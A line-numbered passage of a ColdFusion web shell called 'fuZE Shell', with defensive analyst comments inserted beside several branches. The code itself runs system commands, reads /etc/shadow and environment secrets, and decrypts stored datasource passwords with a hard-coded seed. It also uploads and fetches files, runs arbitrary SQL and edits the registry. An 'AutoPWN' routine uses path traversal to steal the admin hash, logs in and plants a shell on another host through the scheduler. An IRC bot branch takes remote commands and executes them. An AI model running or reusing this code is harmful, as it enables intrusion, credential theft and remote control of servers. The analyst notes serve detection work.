  488. <cfset xmlLogFileDirectory=arraynew(1)>
  489. <cfset Xmlbasepath="C:\WINDOWS\system32\inetsrv\MetaBase.xml">
  490. <cftry>
  491. <cffile action="read" file="#Xmlbasepath#" variable="XMLFileText">
  492. <cfcatch type="any">
  493. <cfoutput>Error reading MetaBase.xml: #cfcatch.type#</cfoutput>
  494. <cfreturn xmlpath>
  495. </cfcatch></cftry>
  496. <cfset myXMLDocument=XmlParse(XMLFileText)>
  497. <cfset numItems = ArrayLen(myXMLDocument.configuration.MBProperty.IIsWebServer)>
  498. <cfloop index="i" from = "1" to = #numItems#>
  499. <cfif findnocase("ServerBindings=",#myXMLDocument.configuration.MBProperty.IIsWebServer[i]#)>
  500. <cfset ServerBindings = #myXMLDocument.configuration.MBProperty.IIsWebServer[i].XmlAttributes.ServerBindings#>
  501. <cfset location = #myXMLDocument.configuration.MBProperty.IIsWebServer[i].XmlAttributes.location#>
  502. <cfset arrayAppend(xmllocation,("#location#"))>
  503. <cfset arrayAppend(xmlServerindings,("#ServerBindings#"))>
  504. <cfif findnocase("LogFileDirectory=",#myXMLDocument.configuration.MBProperty.IIsWebServer[i]#)>
  505. <cfset LogFileDirectory = #myXMLDocument.configuration.MBProperty.IIsWebServer[i].XmlAttributes.LogFileDirectory#>
  506. <cfset arrayAppend(xmlLogFileDirectory,("#LogFileDirectory#"))>
  507. <cfelse>
  508. <cfset arrayAppend(xmlLogFileDirectory,(""))>
  509. </cfif></cfif></cfloop>
  510. <cfset numLocations=arraylen(xmllocation)>
  511. <cfset numItems = ArrayLen(myXMLDocument.configuration.MBProperty.IIsWebVirtualDir)>
  512. <cfloop index="i" from = "1" to = #numItems#>
  513. <cfif findnocase("path",#myXMLDocument.configuration.MBProperty.IIsWebVirtualDir[i]#) >
  514. <cfset path1 = #myXMLDocument.configuration.MBProperty.IIsWebVirtualDir[i].XmlAttributes.path#>
  515. <cfif findnocase("Program Files",#path1#) is 0 and findnocase("WINDOWS",#path1#) is 0>
  516. <cfset listpath=arraytolist(xmlpath)>
  517. <cfif find(#path1#,#listpath#) is 0>
  518. <cfset arrayAppend(xmlpath,"#path1#")>
  519. <cfloop index="j" from = "1" to = #numLocations#>
  520. <cfif findnocase(#xmllocation[j]#,#myXMLDocument.configuration.MBProperty.IIsWebVirtualDir[i].XmlAttributes.Location#) is not 0>
  521. <cfoutput>"#path1#" : "#xmlServerindings[j]#" : "#xmlLogFileDirectory[j]#"#chr(10)#</cfoutput>
  522. </cfif></cfloop></cfif></cfif></cfif></cfloop>
  523. <cfcatch>Error
  524. </cfcatch>
  525. </cftry>
  526. </cfcase>
  527. <cfcase value="View open sessions [W]"><cfexecute name="cmd.exe" arguments="/c query session" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  528. <cfcase value="View local shares"><cfexecute name="cmd.exe" arguments="/c net share" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  529. <cfcase value="View domain shares"><cfexecute name="cmd.exe" arguments="/c net view" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  530. <cfcase value="View users"><cfexecute name="cmd.exe" arguments="/c net user" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  531. <cfcase value="View running processes [W]"><cfexecute name="cmd.exe" arguments="/c tasklist" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  532. <cfcase value="View system info [W]"><cfexecute name="cmd.exe" arguments="/c systeminfo" timeout="30" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  533. <cfcase value="Check disk for consistency"><cfexecute name="cmd.exe" arguments="/c chkdsk" timeout="180" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase> <!--- Shout outs to fractal! --->
  534. <!--- Linux functions --->
  535. <cfcase value="Find SUID files"><cfexecute name="sh" arguments="-c 'find / -type f -perm -04000 -ls'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  536. <cfcase value="Find SGID files"><cfexecute name="sh" arguments="-c 'find / -type f -perm -02000 -ls'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  537. <cfcase value="Find all *conf* files"><cfexecute name="sh" arguments="-c 'find / -type f -name *conf*'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  538. <cfcase value="Find all .*_history files"><cfexecute name="sh" arguments="-c 'find / -type f -name .*_history'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  539. <cfcase value="Find all *.pwd files"><cfexecute name="sh" arguments="-c 'find / -type f -name *.pwd'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  540. <cfcase value="Find all .*rc files"><cfexecute name="sh" arguments="-c 'find / -type f -name .*rc'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  541. <cfcase value="Find all writable directories and files"><cfexecute name="sh" arguments="-c 'find / -perm -2 -ls'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  542. <cfcase value="Find all writable directories and files in current dir"><cfexecute name="sh" arguments="-c 'find . -perm -2 -ls'" timeout="60" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  543. <cfcase value="Read /etc/passwd"><cfexecute name="sh" arguments="-c 'cat /etc/passwd'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  544. <cfcase value="Read /etc/shadow"><cfexecute name="sh" arguments="-c 'cat /etc/shadow'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  545. <cfcase value="Read /proc/self/environ"><cfexecute name="sh" arguments="-c 'cat /proc/self/environ'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  546. <cfcase value="Show opened ports [L]"><cfexecute name="sh" arguments="-c 'netstat -a'" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  547. <cfcase value="View open sessions [L]"><cfexecute name="sh" arguments="-c 'w'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  548. <cfcase value="View recent sessions"><cfexecute name="sh" arguments="-c 'last'" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  549. <cfcase value="View running processes [L]"><cfexecute name="sh" arguments="-c 'ps auxww'" timeout="15" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  550. <cfcase value="View memory info"><cfexecute name="sh" arguments="-c 'df -h;free -m'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  551. <cfcase value="View CPU info"><cfexecute name="sh" arguments="-c 'cat /proc/cpuinfo'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  552. <cfcase value="View system info [L]"><cfexecute name="sh" arguments="-c 'uname -a'" timeout="10" variable="cmdout"></cfexecute>#htmleditformat(cmdout)#</cfcase>
  553. <cfdefaultcase>Invalid function</cfdefaultcase>
  554. </cfswitch>
  555. <cfcatch>Error
  556. </cfcatch>
  557. </cftry>
  558. </textarea>
  559. <cfelseif isDefined("Form.decrypt_hash")>
       <!--- Analyst note: this branch runs when the request carries a decrypt_hash form field.
             The submitted Base64 text is passed to Decrypt() with DESede and a key derived from
             the fixed seed string hard-coded below; the plaintext is written into the report
             textarea without HTML encoding.
             NOTE(review): the seed looks like the static one older ColdFusion releases used for
             stored datasource passwords; confirm against the product version in use. If it is,
             treat every datasource credential on a host where this template ran as exposed and
             rotate it. The literal seed is also a stable string to search for in web roots. --->
  560. <pre>Decrypting '#htmleditformat(Form.decrypt_hash)#'</pre>
  561. <textarea class="report" rows="20">
  562. <cftry>
  563. <cfscript>
  564. dp=Decrypt(Form.decrypt_hash, generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"), "DESede", "Base64");
  565. writeoutput(dp);
  566. </cfscript>
  567. <cfcatch>Invalid hash
  568. </cfcatch>
  569. </cftry>
  570. </textarea>
  571. <cfelseif isDefined("Form.Upload") and Form.Upload EQ "Upload">
       <!--- Analyst note: runs when the Upload form field equals "Upload". cffile action="upload"
             stores the posted File field in the directory of the running template, and
             nameconflict="overwrite" replaces any existing file of the same name. No restriction
             on file type or name is visible in this branch.
             Defensive takeaways: new or modified files beside this template are artefacts worth
             collecting, and the account running ColdFusion should not have write access to
             directories the web server will execute templates from. --->
  572. <pre>Uploading file to '#htmleditformat(getDirectoryFromPath(getCurrentTemplatePath()))#'</pre>
  573. <textarea class="report" rows="20">
  574. <cftry>
  575. <cffile action="upload" destination="#getDirectoryFromPath(getCurrentTemplatePath())#" filefield="Form.File" nameconflict="overwrite">File uploaded!
  576. <cfcatch>Upload failed
  577. </cfcatch>
  578. </cftry>
  579. </textarea>
  580. <cfelseif isdefined("Form.Download")>
       <!--- Analyst note: runs when a Download form field is present. The field value is used
             as the file path handed to cfcontent, and its last path element becomes the
             attachment file name in the Content-Disposition header. No path restriction is
             visible here, so the reachable files are bounded only by what the ColdFusion service
             account can read.
             Detection hint: a template response carrying Content-Disposition: attachment with
             content type application/unknown, in reply to a POST, is unusual for most
             applications. --->
  581. <cftry>
  582. <cfsilent>
  583. <cfheader name="Content-Disposition" value="attachment; filename=#getFileFromPath(Form.Download)#">
  584. <cfcontent type="application/unknown" file="#Form.Download#">
  585. </cfsilent>
  586. <cfcatch>File is not available
  587. <cfabort>
  588. </cfcatch>
  589. </cftry>
  590. <cfelseif isDefined("Form.RUpload")>
       <!--- Analyst note: runs when an RUpload form field is present. cfhttp issues a GET to the
             URL supplied in that field, and cffile writes the response body into the directory
             of the running template, named after the last path segment of the URL.
             Defensive takeaways: the server itself makes the outbound request, so egress
             filtering on the application server and alerting on outbound HTTP followed by file
             creation under the web root both apply. Any failure is reduced to the single word
             "Error", so the page output says nothing about what was attempted; rely on proxy
             and file system logs instead. --->
  591. <pre>Uploading file from '#htmleditformat(Form.RUpload)#'</pre>
  592. <textarea class="report" rows="20">
  593. <cftry>
  594. <cfhttp url="#Form.RUpload#" method="get" getasbinary="yes" result="rFile" />
  595. <cffile action="write" file="#getDirectoryFromPath(getCurrentTemplatePath())##listLast(Form.RUpload,"\/")#" addNewLine="no" output="#rFile.filecontent#" />
  596. <cfoutput>File saved to #htmleditformat(getDirectoryFromPath(getCurrentTemplatePath()))##htmleditformat(listLast(Form.RUpload,"\/"))#</cfoutput>
  597. <cfcatch>Error</cfcatch>
  598. </cftry>
  599. </textarea>
  600. <cfelseif isDefined("Form.exec_sql")>
       <!--- Analyst note: runs when an exec_sql form field is present. The field is placed
             verbatim inside cfquery, and the datasource name, user name and password also come
             from the form, so the statement runs against any datasource configured on this
             server with whatever rights the supplied or configured account holds. The result
             set is rendered with cfdump. No cftry is visible around the query in this branch.
             Defensive takeaways: give datasource accounts only the rights the application needs,
             and review database audit logs for statements arriving from the application server
             that do not match the application's normal queries. --->
  601. <pre><cfoutput>Executing '#htmleditformat(Form.exec_sql)#' in datasource '#htmleditformat(Form.datasource)#'</cfoutput></pre>
  602. <cfquery name="sqlout" datasource="#Form.datasource#" username="#Form.db_username#" password="#Form.db_password#">
  603. #Form.exec_sql#
  604. </cfquery>
  605. <cfdump var="#sqlout#" expand="false">
  606. <cfelseif isDefined("Form.cfscan")>
  607. <pre>Scanning for CF instances over the LAN</pre>
  608. <textarea class="report" rows="20">
  609. <cftry>
  610. <cfset sf = CreateObject("java", "coldfusion.server.ServiceFactory")>
  611. <cfset lic=#sf.LicenseService.runScan()#>
  612. <cfloop collection="#lic#" item="i">
  613. <cfoutput>ColdFusion #lic[i][1]['Edition']# build #lic[i][1]['Build']# at #lic[i][1]['MachineName']# (#lic[i][1]['IpAddrs']#)#chr(10)#</cfoutput>
  614. </cfloop>
  615. <cfcatch>Error<cfif isDefined("cfcatch.message")>: <cfoutput>#cfcatch.message#</cfoutput></cfif></cfcatch>
  616. </cftry>
  617. </textarea>
  618. <cfelseif isDefined("Form.regpath")>
  619. <cftry>
  620. <cfif form.regpath is not "">
  621. <cfif form.entry is "">
  622. <CFREGISTRY Action="getAll"
  623. Branch="#form.regpath#"
  624. Type="Any"
  625. Name="RegQuery">
  626. <CFTABLE Query="RegQuery" colHeaders HTMLTable Border="Yes">
  627. <CFCOL Header="<B>Entry</b>" Width="35" Text="#RegQuery.Entry#">
  628. <CFCOL Header="<B>Type</b>"  Width="10" Text="#RegQuery.type#">
  629. <CFCOL Header="<B>Value</b>" Width="35" Text="#RegQuery.Value#">
  630. </CFTABLE>
  631. <cfelse>
  632. <cfif form.newentry is "">
  633. <CFPARAM NAME="RegValue" DEFAULT="not found">
  634. <CFREGISTRY Action = "get"  Branch = "#form.regpath#" Entry = "#form.Entry#"  Type="#form.regtype#" variable = "RegValue">
  635. <cfoutput>(#form.regpath#\#form.Entry# )  values is : #RegValue#</cfoutput>
  636. <cfelse>
  637. <CFPARAM NAME="RegValue" DEFAULT="not found">
  638. <CFREGISTRY Action = "get"  Branch = "#form.regpath#" Entry = "#form.Entry#" Variable = "RegValue" Type = "#form.regtype#">
  639. <cfoutput>(#form.regpath#\#form.Entry# )  old  values is : #RegValue#<br /></cfoutput>
  640. <cfif regvalue is not "not found">
  641. <CFREGISTRY Action="set" Branch="#form.regpath#"  Entry="#form.Entry#" Type="#form.regtype#" Value="#form.newEntry#">
  642. <cfoutput>(#form.regpath#\#form.Entry# )  new  values is : #form.newEntry#</cfoutput>
  643. </cfif>
  644. </cfif>
  645. </cfif>
  646. <cfelse>Error: A registry path must be defined
  647. </cfif>
  648. <cfcatch type="any"><cfoutput>Error: #cfcatch.type#</cfoutput></cfcatch>
  649. </cftry>
  650. <cfelseif isDefined("Form.target_host")>
  651. <pre>Attempting to AutoPWN [#htmleditformat(Form.target_host)#]</pre>
  652. <cftry>
  653. <cfset target_host=Form.target_host>
  654. <textarea class="report" rows="20">
  655. ====================================================================================================
  656. [~] AutoPWN report for [<cfoutput>#HTMLEditFormat(target_host)#</cfoutput>]
  657. <cfset lfi=[
  658. <!--- Single server configuration ColdFusion --->
  659. "..\..\..\..\..\..\..\..\CFusionMX\lib\password.properties",
  660. <!--- ColdFusion 7 --->
  661. "..\..\..\..\..\..\..\..\CFusionMX7\lib\password.properties",
  662. <!--- ColdFusion 8 --->
  663. "..\..\..\..\..\..\..\..\ColdFusion8\lib\password.properties",
  664. <!--- ColdFusion 6, 7 AND 8 --->
  665. "..\..\..\..\..\..\..\..\..\..\JRUN4\servers\cfusion\cfusion-ear\cfusion-war\WEB-INF\cfusion\lib\password.properties"
  666. ]>
  667. <cfset lfi_success=FALSE>
  668. <cfloop array="#lfi#" index="i">
  669. <cfhttp url="http://#target_host#/CFIDE/administrator/logging/settings.cfm?locale=#i#%00en" result="lfiresult" method="get"></cfhttp>
  670. <cfset cfadmin_hash=REReplace(REReplace(REReplace(lfiresult.Filecontent,"(.*?)password=","","ALL"),"#chr(10)#encrypted(.*?)</html>","","ALL"),"\s","","ALL")>
  671. <cfif Len(cfadmin_hash) GT 0 AND Len(cfadmin_hash) LTE 40 AND cfadmin_hash NEQ "ConnectionFailure">
  672. <cfset lfi_success=TRUE>
  673. <cfbreak>
  674. </cfif>
  675. </cfloop>
  676. <cfif lfi_success EQ TRUE>[!] LFI succeeded, hash acquired: <cfoutput>#HTMLEditFormat(cfadmin_hash)#</cfoutput>
  677. <cfelse><cfthrow message="LFI failed">
  678. </cfif>
  679. <cfhttp url="http://#target_host#/CFIDE/administrator/enter.cfm" result="adminpage" method="get">
  680. <cfset cfadmin_salt=REReplace(Mid(adminpage.Filecontent,13,REFind("[0-9]{13}",adminpage.Filecontent)), "(.*?)salt"" type=""hidden"" value=""","","ALL")>
  681. <cfswitch expression="#Len(cfadmin_hash)#">
  682. <cfcase value="40">
  683. <cfset secretKeySpec=createObject("java","javax.crypto.spec.SecretKeySpec").init(toBinary(toBase64(cfadmin_salt)),"HmacSHA1")>
  684. <cfset mac=createObject("java","javax.crypto.Mac").getInstance("HmacSHA1")>
  685. <cfset mac.init(secretKeySpec)>
  686. <cfset encryptedBytes=mac.doFinal(toBinary(toBase64(cfadmin_hash)))>
  687. <cfset cfadmin_password=BinaryEncode(mac.doFinal(toBinary(toBase64(cfadmin_hash))),"Hex")>
  688. </cfcase>
  689. <cfdefaultcase>
  690. <!--- TODO: CF6 Auth --->
  691. <cfthrow message="CF6 authentication is unsupported">
  692. </cfdefaultcase>
  693. </cfswitch>
  694. [*] Logging in
  695. <cfset responsecookies=adminpage.Responseheader["Set-Cookie"]>
  696. <cfset cookiearray=ArrayNew(1)>
  697. <cfloop item="i" collection="#responsecookies#">
  698. <cfset cookiearray[i]=ListGetAt(responsecookies[i],1,";")>
  699. </cfloop>
  700. <cfhttp url="http://#target_host#/CFIDE/administrator/enter.cfm" result="adminlogin" method="post" redirect="false">
  701. <cfhttpparam type="header" name="Cookie" value="#ArraytoList(cookiearray,'; ')#">
  702. <cfhttpparam type="formfield" name="cfadminUserId" value="admin">
  703. <cfhttpparam type="formfield" name="cfadminPassword" value="#cfadmin_password#">
  704. <cfhttpparam type="formfield" name="salt" value="#cfadmin_salt#">
  705. </cfhttp>
  706. <cfset authorizationcookies=adminlogin.Responseheader["Set-Cookie"]>
  707. <cfset admincookiearray=ArrayNew(1)>
  708. <cfloop item="i" collection="#authorizationcookies#">
  709. <cfset admincookiearray[i]=ListGetAt(authorizationcookies[i],1,";")>
  710. </cfloop>
  711. <cfset authkey=admincookiearray[4]>
  712. <cfhttp url="http://#target_host#/CFIDE/administrator/reports/index.cfm" result="settingssummary" method="get">
  713. <cfhttpparam type="header" name="Cookie" value="#authkey#">
  714. </cfhttp>
  715. <cfset runtime_user=REReplace(REReplace(REReplace(settingssummary.Filecontent,"(.*?)User Name(.*?)#chr(9)##chr(9)##chr(9)##chr(9)#","","ONE")," &nbsp;(.*?)</html>","","ONE"),"\s","","ALL")>
  716. <cfset cfide_path=REReplace(REReplace(REReplace(settingssummary.Filecontent,"(.*?)#chr(9)#/CFIDE (.*?)#chr(9)##chr(9)##chr(9)##chr(9)#","","ONE")," &nbsp;(.*?)</html>","","ONE"),"\s","","ALL")>
  717. <cfif REFind("/",cfide_path)><cfset slash="/">
  718. <cfelse><cfset slash="\">
  719. </cfif>[*] Creating payload objects
  720. <cfset shell_name=listFirst(listLast(getCurrentTemplatePath(),"\/"),".")>
  721. <cffile action="Copy" source="#getCurrentTemplatePath()#" destination="#getDirectoryFromPath(getCurrentTemplatePath())##shell_name#.txt">
  722. <cfset shell_url="http://#cgi.local_addr##reverse(listRest(reverse(CGI.SCRIPT_NAME),"/"))#/#shell_name#.txt">
  723. <cfhttp url="http://#target_host#/CFIDE/administrator/scheduler/scheduleedit.cfm" result="scheduletask" method="post">
  724. <cfhttpparam type="header" name="Cookie" value="#authkey#">
  725. <cfhttpparam type="formfield" name="TaskName" value="CFSh">
  726. <cfhttpparam type="formfield" name="Start_Date" value="1/3/37">
  727. <cfhttpparam type="formfield" name="ScheduleType" value="Once">
  728. <cfhttpparam type="formfield" name="StartTimeOnce" value="12:00 AM">
  729. <cfhttpparam type="formfield" name="Interval" value="Daily">
  730. <cfhttpparam type="formfield" name="customInterval_hour" value="0">
  731. <cfhttpparam type="formfield" name="customInterval_min" value="0">
  732. <cfhttpparam type="formfield" name="customInterval_sec" value="0">
  733. <cfhttpparam type="formfield" name="Operation" value="HTTPRequest">
  734. <cfhttpparam type="formfield" name="ScheduledURL" value="#shell_url#">
  735. <cfhttpparam type="formfield" name="publish" value="1">
  736. <cfhttpparam type="formfield" name="publish_file" value="#cfide_path##slash##shell_name#.cfm">
  737. <cfhttpparam type="formfield" name="adminsubmit" value="Submit">
  738. <cfhttpparam type="formfield" name="taskNameOrig" value=""> <!--- CF8- --->
  739. </cfhttp>
  740. <cfhttp url="http://#target_host#/CFIDE/#shell_name#.cfm" result="shell_status" method="get">
  741. <cfif find("&fnof;uZE Shell",shell_status.Filecontent) is not 0>[!] &fnof;uZE copied successfully
  742. <cfelse>[!] Shell not found, recreating payload to subvert firewall
  743. <cfhttp url="http://#target_host#/CFIDE/administrator/scheduler/scheduleedit.cfm" result="scheduletask" method="post">
  744. <cfhttpparam type="header" name="Cookie" value="#authkey#">
  745. <cfhttpparam type="formfield" name="TaskName" value="CFSh">
  746. <cfhttpparam type="formfield" name="Start_Date" value="1/3/37">
  747. <cfhttpparam type="formfield" name="ScheduleType" value="Once">
  748. <cfhttpparam type="formfield" name="StartTimeOnce" value="12:00 AM">
  749. <cfhttpparam type="formfield" name="Interval" value="Daily">
  750. <cfhttpparam type="formfield" name="customInterval_hour" value="0">
  751. <cfhttpparam type="formfield" name="customInterval_min" value="0">
  752. <cfhttpparam type="formfield" name="customInterval_sec" value="0">
  753. <cfhttpparam type="formfield" name="Operation" value="HTTPRequest">
  754. <cfhttpparam type="formfield" name="ScheduledURL" value="/CFIDE/probe.cfm?name=%3Cb%3E%26%23181%3BSH%3C%2Fb%3E%22%3C%2Fh1%3E%3Ccfif%20isDefined(%22Form.File%22)%3E%3Ccftry%3E%3Ccffile%20action%3D%22upload%22%20destination%3D%22%23Expandpath(%22.%22)%23%22%20filefield%3D%22Form.File%22%20nameconflict%3D%22overwrite%22%3EFile%20uploaded!%3Ccfcatch%3EUpload%20failed%3C%2Fcfcatch%3E%3C%2Fcftry%3E%3C%2Fcfif%3E%3Cform%20method%3DPOST%20enctype%3D%22multipart%2Fform-data%22%3E%3Cinput%20type%3Dfile%20name%3D%22File%22%3E%3Cinput%20type%3Dsubmit%20value%3D%22Upload%22%3E%3C%2Fform%3E%3Cscript%3E">
  755. <cfhttpparam type="formfield" name="publish" value="1">
  756. <cfhttpparam type="formfield" name="publish_file" value="#cfide_path##slash#microshell.cfm">
  757. <cfhttpparam type="formfield" name="adminsubmit" value="Submit">
  758. <cfhttpparam type="formfield" name="taskNameOrig" value="CFSh"> <!--- CF8- --->
  759. </cfhttp>
  760. <cfhttp url="http://#target_host#/CFIDE/microshell.cfm" result="shell_status_2" method="get">
  761. <cfif find("&##181;SH",shell_status_2.Filecontent) is not 0>[!] Firewall subversion was successful
  762. <cfelse>[!] Shell not found
  763. </cfif>
  764. </cfif>[*] Removing payload objects
  765. <cfhttp url="http://#target_host#/CFIDE/administrator/scheduler/scheduletasks.cfm?action=delete&task=CFSh" result="deletetask" method="get">
  766. <cfhttpparam type="header" name="Cookie" value="#authkey#">
  767. <cffile action="Delete" file="#getDirectoryFromPath(getCurrentTemplatePath())##shell_name#.txt">
  768. </cfhttp>[~] Results:
  769. [*] Server Status: <cfif find("&fnof;uZE Shell",shell_status.Filecontent) NEQ 0 OR find("&##181;SH",shell_status_2.Filecontent) NEQ 0>Compromised<cfelse>Uncompromised</cfif>
  770. [*] Access obtained: <cfoutput>#HTMLEditFormat(runtime_user)#</cfoutput>
  771. [*] Shell location: <cfif find("&fnof;uZE Shell",shell_status.Filecontent) NEQ 0><cfoutput>#HTMLEditFormat("http://#target_host#/CFIDE/#shell_name#.cfm")#</cfoutput><cfelseif find("&##181;SH",shell_status_2.Filecontent) NEQ 0><cfoutput>#HTMLEditFormat("http://#target_host#/CFIDE/microshell.cfm")#</cfoutput><cfelse>N/A</cfif>
  772. [~] EOF
  773. ====================================================================================================</textarea>
  774. <cfcatch>[!] Error<cfif isDefined("cfcatch.message")>: <cfoutput>#cfcatch.message#</cfoutput></cfif>
  775. [~] Results:
  776. [*] Server Status: N/A
  777. [*] Access obtained: N/A
  778. [*] Shell location: N/A
  779. [~] EOF
  780. ====================================================================================================</textarea>
  781. </cfcatch>
  782. </cftry>
  783. <cfelseif isDefined("Form.nuke")>
       <!--- Analyst note: runs when a nuke form field is present and deletes the file of the
             running template itself.
             Forensic takeaway: the absence of this file on disk is not evidence that the host
             was never compromised. Web server access logs, file system timelines and files
             written by the other branches of this template remain the sources to check. --->
  784. <pre>Nuking shell</pre>
  785. <textarea class="report" rows="20">
  786. <cftry>
  787. <cffile action="delete" file="#getCurrentTemplatePath()#">
  788. Shell nuked
  789. <cfcatch>Error</cfcatch>
  790. </cftry>
  791. </textarea>
  792. <cfelseif isDefined("Form.ircip") and isDefined("Form.ircport")>
  793. <pre>Connecting to #htmleditformat(Form.ircip)#:#htmleditformat(Form.ircport)#</pre>
  794. <textarea class="report" rows="20">
  795. <cftry>
  796. <cfscript>
  797. try{
  798.  
  799. // Create socket
  800. socket=createObject("java","java.net.Socket");
  801.  
  802. // Connect to remote host
  803. socket.connect(createObject("java","java.net.InetSocketAddress").init(Form.ircip,Form.ircport));
  804. writeoutput("Remote port reached: #socket.isConnected()##chr(10)#");
  805.  
  806. // Establish connection
  807. try{
  808. instream=createObject("java","java.io.BufferedReader").init(createObject("java","java.io.InputStreamReader").init(socket.getInputStream()));
  809. outstream=createObject("java","java.io.PrintWriter").init(socket.getOutputStream());
  810. writeoutput("Connection successful!#chr(10)#");
  811. } catch (IOException e) {
  812. writeoutput("IO Exception: Read failed#chr(10)#");
  813. }
  814.  
  815. // Communicate
  816. outstream.println("NICK #Form.ircnick#");
  817. outstream.println("USER #Form.ircuname# 8 * :#Form.ircrname#");
  818. outstream.flush();
  819. while(True){
  820. str = instream.readLine();
  821. cmd = str.split(" ");
  822.  
  823. //---------------------CLIENT----------------------//
  824. if (not cmd[1] EQ "PING"){
  825. if (cmd[2] EQ "433"){
  826. writeoutput("Nickname already in use: #Form.ircnick##chr(10)#");
  827. Form.ircnick="#Form.ircnick#_";
  828. outstream.println("NICK #Form.ircnick#");
  829. outstream.flush();
  830. }
  831. else if (cmd[2] EQ "004"){
  832. writeoutput("Entered IRC#chr(10)#");
  833. outstream.println("JOIN #Form.ircchan#");
  834. outstream.flush();
  835. }
  836. else if (FindNoCase(":>",str)){
  837. command_init=str.split(":>");
  838. command=command_init[2].split(" ");
  839. switch(command[1]){
  840. //---------------------//
  841. // Commands
  842. //---------------------//
  843. // Raw
  844. case "raw":
  845. {
  846. raw_init=str.split(":>raw ");
  847. raw=raw_init[2];
  848. outstream.println("#raw#");
  849. outstream.flush();
  850. break;
  851. }
  852. //---------------------//
  853. // Decrypt
  854. case "decrypt":
  855. {
  856. decrypt_init=str.split(":>decrypt ");
  857. decrypt_hash=decrypt_init[2];
  858. channel=cmd[3];
  859. outstream.println("PRIVMSG #channel# :Decrypting '#chr(15)##decrypt_hash##chr(15)#'");
  860. outstream.flush();
  861. dp=Decrypt(decrypt_hash, generate3DesKey("0yJ!@1$r8p0L@r1$6yJ!@1rj"), "DESede", "Base64");
  862. dp=replace(dp,chr(2),"\x02","ALL"); // Escape IRC bold character
  863. dp=replace(dp,chr(3),"\x03","ALL"); // Escape IRC color character
  864. dp=replace(dp,chr(7),"\x07","ALL"); // Escape IRC beep character
  865. dp=replace(dp,chr(10),"\x0A","ALL"); // Escape LF
  866. dp=replace(dp,chr(13),"\x0D","ALL"); // Escape CR
  867. dp=replace(dp,chr(15),"\x0f","ALL"); // Escape IRC no format character
  868. dp=replace(dp,chr(16),"\x16","ALL"); // Escape IRC reverse character
  869. dp=replace(dp,chr(31),"\x1f","ALL"); // Escape IRC underline character
  870. outstream.println("PRIVMSG #channel# :'#dp#'");
  871. outstream.flush();
  872. break;
  873. }
  874. //---------------------//
  875. // Execute
  876. case "exec":
  877. {
  878. exec_init=str.split(":>exec ");
  879. exec=exec_init[2].split(" ");
  880. channel=cmd[3];
  881. outstream.println("PRIVMSG #channel# :Executing '#chr(15)##exec_init[2]##chr(15)#'");
  882. outstream.flush();
  883. p = createObject("java","java.lang.ProcessBuilder").init(exec).start();
  884. i = createObject("java","java.io.InputStreamReader").init(p.getInputStream());
  885. br = createObject("java","java.io.BufferedReader").init(i);
  886. line=br.readLine();
  887. while (isDefined("line")) {
  888. outstream.println("PRIVMSG #channel# :> #line#");
  889. outstream.flush();
  890. line = br.readLine();
  891. }
  892. br.close();
  893. i.close();
  894. break;
  895. }
  896. //---------------------//
  897. // Help
  898. case "help":
  899. {
  900. channel=cmd[3];
  901. outstream.println("PRIVMSG #channel# :fuZE CF IRC Datapipe | Developed by XiX");
  902. outstream.println("PRIVMSG #channel# :Commands: >raw >decrypt >exec >help >exit");
  903. outstream.flush();
  904. break;
  905. }
  906. //---------------------//
  907. // Exit
  908. case "exit":
  909. {
  910. outstream.close();
  911. instream.close();
  912. socket.close();
  913. break;
  914. }
  915. //---------------------//
  916. // Invalid command
  917. default:
  918. {
  919. break;
  920. }
  921. //---------------------//
  922. }
  923. }
  924. }
  925. else {
  926. outstream.println("PONG #str.substring(5)#");
  927. outstream.flush();
  928. }
  929. //--------------------------------------------------//
  930.  
  931. }
  932.  
  933. }catch (Exception e) {
  934. writeoutput("Exception: Error#chr(10)#");
  935. }
  936. </cfscript>
  937. <cfcatch>Connection terminated</cfcatch>
  938. </cftry>
  939. </textarea>
  940. <cfelse>
  941. <pre>Waiting for input</pre>
  942. <textarea class="report" rows="20">Welcome to &fnof;uZE Shell</textarea>
  943. </cfif>
  944. </cfoutput></td><td width="25%">
  945. <div class="container">
  946.     <div class="menu">
  947.         <div id='nav'><a href="#execute" name="modal">:: Execute command on server ::</a></div>
  948.         <div id='nav'><a href="#reverse" name="modal">:: Reverse shell ::</a></div>
  949.         <div id='nav'><a href="#functions" name="modal">:: Functions ::</a></div>
  950.         <div id='nav'><a href="#updown" name="modal">:: Upload/download files on server ::</a></div>
  951.         <div id='nav'><a href="#runsql" name="modal">:: Run SQL query ::</a></div>
  952.         <div id='nav'><a href="#registry" name="modal">:: Registry ::</a></div>
  953.         <div id='nav'><a href="#edit" name="modal">:: Edit file ::</a></div>
